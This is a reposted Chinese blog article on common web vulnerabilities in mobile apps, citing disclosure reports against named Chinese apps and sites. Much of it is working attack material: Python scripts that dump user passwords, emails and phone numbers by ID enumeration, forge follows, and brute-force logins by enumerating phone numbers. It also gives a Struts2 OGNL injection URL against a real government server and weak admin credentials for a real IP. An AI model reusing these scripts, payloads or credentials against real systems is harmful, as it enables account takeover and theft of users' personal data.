移动App中常见的Web漏洞
?本文轉自:http://www.dickeye.com/?id=16
?主要是手機APP漏洞 放在web端測試 學習了
智能手機的存在讓網民的生活從PC端開始往移動端轉向,現在網民的日常生活需求基本上一部手機就能解決。外賣,辦公,社交,銀行轉賬等等都能通過移動端App實現。那么隨之也帶來了很多信息安全問題,大量的用戶信息儲存在移動App中,由于移動App的開發并不健全,由移動App引發的用戶信息泄露事件也層出不窮。
移動App中的Web型漏洞主要分為以下幾塊:
?
1.SQL注入漏洞
?
這是一個不能再常見的漏洞類型了,由于App的特性,開發人員認為使用App時無法獲取到詳細URL等信息,所以忽視了App防注入的編寫。
例如:
糗事百科某處SQL注入可導致1500w用戶信息泄露
http://loudong.360.cn/vul/info/qid/QTVA-2015-177818
全峰快遞注入漏洞,可直接建服務器用戶,各種訂單用戶數據泄露
http://loudong.360.cn/vul/info/qid/QTVA-2014-106574
永輝超市Appsql注入導致超市及用戶信息泄露?
http://loudong.360.cn/vul/info/qid/QTVA-2014-106385
社交App“小濕妹”某處洞洞,數據庫淪陷
http://loudong.360.cn/vul/info/qid/QTVA-2015-179315
提升逼格的App“交換”數據庫淪陷,用戶信息泄露
http://loudong.360.cn/vul/info/qid/QTVA-2015-177968
?
這些漏洞都是由于App開發中忽視了接口可能存在SQL注入問題,其中也包括POST注入,GET注入,COOKIE注入等等。
拿糗事百科注入詳細舉例:
在查詢用戶詳細信息時抓包,包內容如下:
????GET?/user/6122886/detail?rqcnt=12&r=dec363d71423481245949?HTTP/1.1????User-Agent:?qiushibalke_6.2.0_WIFI_auto_7????Source:?android_6.2.0????Model:?Xiaomi/cancro_wc_lte/cancro:4.4.4/KTU84P/V6.3.3.0.KXDCNBL:user/release-keys????Qbtoken:?929efcfa9875f584f9f4db17343d16d7b1ec404b????Uuid:?IMEI_2af2c2beee1dbd00d3436cffdec363d7????Deviceidinfo:?{"DEVICEID":"99000566573203","RANDOM":"","ANDROID_ID":"2e6990c574abdd57","SIMNO":"89860313100285780111'","IMSI":"460031219452851","SERIAL":"5d999491","MAC":"0c:1d:af:db:07:9c","SDK_INT":19}????Host:?nearby.qiushibaike.com????Connection:?Keep-Alive????Accept-Encoding:?gzip其中Qbtoken參數存在注入
2.任意用戶注冊漏洞
?
此類漏洞并不危害到用戶信息泄露,但是別有用心的黑客可能會利用此漏洞注冊任意手機號碼,并利用此注冊賬號去社工號碼主人的朋友或者家人。
漏洞案例:
?
App“tataufo”某處漏洞可修改任意用戶密碼
http://loudong.360.cn/vul/info/qid/QTVA-2015-192209
App“約飯”任意用戶注冊
http://loudong.360.cn/vul/info/qid/QTVA-2015-193610
App“樓樓”任意用戶注冊
http://loudong.360.cn/vul/info/qid/QTVA-2015-193622
?
任意用戶注冊漏洞中大部分是由于驗證碼機制不健全和注冊過程驗證不嚴謹,其中App“約飯”任意用戶注冊中
發送注冊請求后直接返回了驗證碼值。
?
而App“樓樓”任意用戶注冊中,注冊流程分為四個步驟
(1).注冊用戶,填寫手機號,發送接收驗證碼請求。
(2).接收驗證碼,并填寫。
(3).填寫并驗證驗證碼,進入填寫資料步驟。
(4).填寫用戶資料,完成注冊。
而這里在第四個步驟中出現了問題,前三步正常操作,在第四步時將資料中的號碼改為任意手機號即能實現任意用戶注冊。
?
?
3.用戶信息泄露
這種類型的漏洞多在用戶資料查閱處存在,由于編寫不嚴謹,在查詢用戶資料時會返回用戶隱私信息,如賬號郵箱,手機,密碼等。
如:
App“嘰友”泄露用戶信息
http://loudong.360.cn/vul/info/qid/QTVA-2015-193589
Duang~App“小柚”用戶信息泄露附驗證腳本(密碼,郵箱,手機號)
http://loudong.360.cn/vul/info/qid/QTVA-2015-187508
糗事百科某處泄露用戶信息
http://loudong.360.cn/vul/info/qid/QTVA-2015-177827
拿App“小柚”舉例
?
????? 訪問用戶資料直接返回一些敏感信息,密碼,郵箱,手機號
????? 寫個Python腳本來dump用戶信息
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | ????#!/usr/bin/env?python ????#?_*_?coding:?utf-8?_*_? ????#?author=Hydra_Tc ????#?create=20150227 ????import?os ????import?json ????import?random ????import?requests ????import?threadpool?as?tp ????def?baopo(): ????????????flag?=?0 ????????????userid?=?0 ????????????while?True: ????????????????????flag?+=?1 ????????????????????userid?+=?1 ????????????????????data?=?{'userid'?:?userid,} ????????????????????api_url?=?'http://App.hixiaoyou.com/User/Me/getuserinfo' ????????????????????my_string?=?"userid" ????????????????????try: ????????????????????????????print?'[%s]?Test?Userid:?%s'?%?(flag,?userid) ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=5) ????????????????????????????req_id?=?json.loads(req.content)['userid'] ????????????????????????????req_mail?=?json.loads(req.content)['email'] ????????????????????????????req_mobile?=?json.loads(req.content)['mobile'] ????????????????????????????req_qq?=?json.loads(req.content)['QQ'] ????????????????????????????req_pass?=?json.loads(req.content)['password'] ????????????????????except: ????????????????????????????req_status?=?0 ????????????????????if?my_string?in?req.json(): ????????????????????????????success_f?=?open('./success_user1.txt',?'a+') ????????????????????????????success_f.write('%s--%s--%s--%s--%s\n'%(req_id,req_qq,req_mobile,req_mail,req_pass)) ????????????????????????????success_f.close() ????????????????????????? ????if?__name__?==?'__main__': ????????????baopo() ????????????pool?=?tp.ThreadPool(100) ????????????reqs?=?tp.makeRequests(baopo) ????????????[pool.putRequest(req)?for?req?in?reqs] ????????????pool.wait() |
?
????????結果如下
????????
?
????????
?
????????
????????4.框架問題(st2等)
?
????????這個并不多但也不容忽視
????????國家統計局手機網站新聞管理系統兩處漏洞
????????http://loudong.360.cn/vul/info/qid/QTVA-2014-113456
????????App“將愛”某漏洞可致服務器淪陷,泄露用戶信息
????????http://loudong.360.cn/vul/info/qid/QTVA-2015-193592
?
????????國家統計局手機新聞管理系統漏洞如下:
http://219.235.129.108:8080/NewManager/admin/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D?
5.后臺弱口令
由于App站點URL信息并不是很明顯,所以管理在設置后臺路徑和密碼方面也顯得比較隨意
如:
北京市地鐵站新聞后臺管理系統淪陷
http://loudong.360.cn/vul/info/qid/QTVA-2014-124853
?
????????抓包得到
????????http://119.254.65.181/SubwayManagement/webservice/SubwayService
????????往上跨目錄得到
????????http://119.254.65.181/SubwayManagement/和http://119.254.65.181/
????????兩個后臺系統,前者存在弱口令admin?admin??和??admin?beijingditieAppadmin
????????
?
?
6.越權漏洞
這個漏洞出現率僅次于SQL注入
App“逗萌”某處設計不當(附驗證腳本)
http://loudong.360.cn/vul/info/qid/QTVA-2015-192485
社交App“足記”漏洞打包
http://loudong.360.cn/vul/info/qid/QTVA-2015-178379
App“tataufo”某處漏洞可修改任意用戶密碼
http://loudong.360.cn/vul/info/qid/QTVA-2015-192209
?
拿App“逗萌”某處設計不當為例
在App中對用戶添加關注處沒有任何驗證
????POST?/HC_AppClient/client-method/followUser.json?HTTP/1.1????Content-Length:?39????Content-Type:?Application/x-www-form-urlencoded????Host:?115.29.5.49:80????Connection:?Keep-Alive????User-Agent:?Apache-HttpClient/UNAVAILABLE?(java?1.4)?????fromUserId=14004049&toUserId=1398055700?
寫了個腳本開始刷粉絲
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 | ????#!/usr/bin/env?python ????#?_*_?coding:?utf-8?_*_? ????#?author=Hydra_Tc ????#?create=20150306 ????import?os ????import?json ????import?random ????import?requests ????import?threadpool?as?tp ????def?baopo(): ????????????flag?=?1 ????????????fromUserId?=?13980556 ????????????while?True: ????????????????????flag?+=?1 ????????????????????fromUserId?+=?1 ????????????????????data?=?{'fromUserId'?:?fromUserId, ????????????????????????????????????'toUserId'?:?'13980556',} ????????????????????api_url?=?'http://115.29.5.49/HC_APPClient/client-method/followUser.json' ????????????????????my_string?=?"body" ????????????????????try: ????????????????????????????print?'[%s]?Test?Userid:?%s'?%?(flag,?fromUserId) ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=5) ????????????????????except: ????????????????????????????req_status?=?0 ????????????????????if?my_string?in?req.json(): ????????????????????????????success_f?=?open('./success_user1.txt',?'a+') ????????????????????????????success_f.write('%s\n'%(fromUserId)) ????????????????????????????success_f.close() ????????????????????????? ????if?__name__?==?'__main__': ????????????baopo() ????????????pool?=?tp.ThreadPool(100) ????????????reqs?=?tp.makeRequests(baopo) ????????????[pool.putRequest(req)?for?req?in?reqs] ????????????pool.wait() |
?
7.接口未限制導致撞庫
?
其實這個我也是看到蘑菇牛發的沒拍漏洞才開始注意此類型漏洞的,運氣還算不錯,兩三天就找到個同類型的、
?
App“瘋拍”兩處漏洞打包,附驗證腳本
http://loudong.360.cn/vul/info/qid/QTVA-2015-185861
?
瘋拍存在兩處漏洞,此處只舉例接口未限制導致撞庫
我用一個未注冊手機號登陸返回提示
????{"success":false,"error":"\u8be5\u53f7\u7801\u5c1a\u672a\u6ce8\u518c\uff0c\u8bf7\u5148\u6ce8\u518c"}{"success":false,"error":"該號碼尚未注冊,請先注冊"}?
提示尚未注冊,用注冊的用戶登陸。
若密碼錯誤,則會提示
????{"success":false,"error":"\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3"}{"success":false,"error":"密碼錯誤,再仔細想想"}????若密碼正確
????{"success":true,"data":{"data":{"ucookie":"19151821c062f8a0252dc3a951940b8dc5a238188447a260b145e1e40fc3d48d9","username":"1234566666","avatar":"","level":0,"score":0,"setting":"{}","uid":16942,"nickname":"1234566666","t":1424918536},"expire":false}}?
此處內容包含cookie,等相關信息。那么我們在蘑菇的腳本上稍微加一些改動即可實現爆破。
腳本如下,加了注釋
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 | ????#!/usr/bin/env?python ????#?_*_?coding:?utf-8?_*_? ????#?author=Hydra_Tc ????#?create=20150224S ????import?json ????import?random ????import?requests ????import?threadpool?as?tp ????def?_burp(mobile):?#?驗證密碼是否正確 ????????????for?password?in?['qwertyu','123456',?'123456789',?'000000',?mobile,'1234567','12345678','1234567890']:?#?弱口令密碼 ????????????????????api_url?=?'http://aifengpai.com/api/user/login'???#?登陸接口 ????????????????????data?=?{'mobile':?mobile, ????????????????????????????????????'did':'c71c53fa20c38d4a14ae8245bac9bb99', ????????????????????????????????????'password':?password,}???#?登陸參數,這里簡化了,去除了不必要的參數 ????????????????????try: ????????????????????????????print?'[*]?Burp?mobile:?%s'?%?mobile ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=5)?#?requests模塊的post請求 ????????????????????except: ????????????????????????????continue ????????????????????try: ????????????????????????????success?=?json.loads(req.content)['data'] ????????????????????????????burp_success?=?open('./fengpai_account.txt',?'a+')?#?隨機成功后生成該txt,并寫成功數據 ????????????????????????????burp_success.write('%s:::%s\n'%(mobile,?password)) ????????????????????????????burp_success.close() ????????????????????????????print?success ????????????????????????????return?success ????????????????????except: ????????????????????????????success?=?0 ????????????????????????????print?'[-]?Burp?False' ????????????????????????????continue ????def?_status(args):?#?判斷手機號是否注冊 ????????????flag?=?0 ????????????list?=?"0123456789"? ????????????sa?=?[] ????????????for?i?in?range(8):?#長度8,改了一下蘑菇牛的范圍寫法,自身測試感覺測試速度稍微加快了點 ????????????????????sa.Append(random.choice(list)) ????????????while?True: ????????????????????flag?+=?1 ????????????????????account_test?=?random.choice(['138','130','133','135','138','139','150','152','155','159','180','181','182','185','187','189'])\?#?手機號前幾位 ????????????????????????????????????????????????????+''.join(sa) ????????????????????data?=?{'mobile':?account_test, ????????????????????????????????????'did':'c71c53fa20c38d4a14ae8245bac9bb99', ????????????????????????????????????'password':?'jhjhksd'} ????????????????????api_url?=?'http://aifengpai.com/api/user/login' ????????????????????try: ????????????????????????????print?'[%s]?Test?account:?%s'?%?(flag,?account_test) ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=3) ????????????????????????????req_status?=?json.loads(req.content)['error']?#?提取response里error處內容 ????????????????????except: ????????????????????????????req_status?=?0 ????????????????????if?req_status?==?u'\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3':?#兩值相等則存在有該賬號 ????????????????????????????success_f?=?open('./fp_phone.txt',?'a+') ????????????????????????????success_f.write('%s\n'%account_test) ????????????????????????????success_f.close() ????????????????????????????_burp(account_test) ????????????????????????????print?'\n[OK]?account:?%s\n'?%?account_test ????if?__name__?==?'__main__': ????????????args?=?[] ????????????for?i?in?range(30): ????????????????????args.Append(args)? ????????????pool?=?tp.ThreadPool(30) ????????????reqs?=?tp.makeRequests(_status,?args) ????????????[pool.putRequest(req)?for?req?in?reqs] ????????????pool.wait() |
改了下蘑菇牛的隨機數生成方式。
?????? 因為該App并沒有像美拍那樣擁有很多用戶所以爆破起來有點難,所以我在測試的時候把,測試范圍函數里的list改為了
???list?=?"8"?????? 手機前三位改為了
????account_test?=?random.choice(['138'])\?#?手機號前幾位????
????這樣只會生成13888888888(這個號碼提交之前測試時候注冊過)
????????進行爆破結果如下
?
轉載于:https://www.cnblogs.com/dongchi/p/4466951.html
總結
以上是生活随笔為你收集整理的移动App中常见的Web漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: vue-cli项目引入highchart
- 下一篇: 总结一下《17天搞定GRE单词》的方法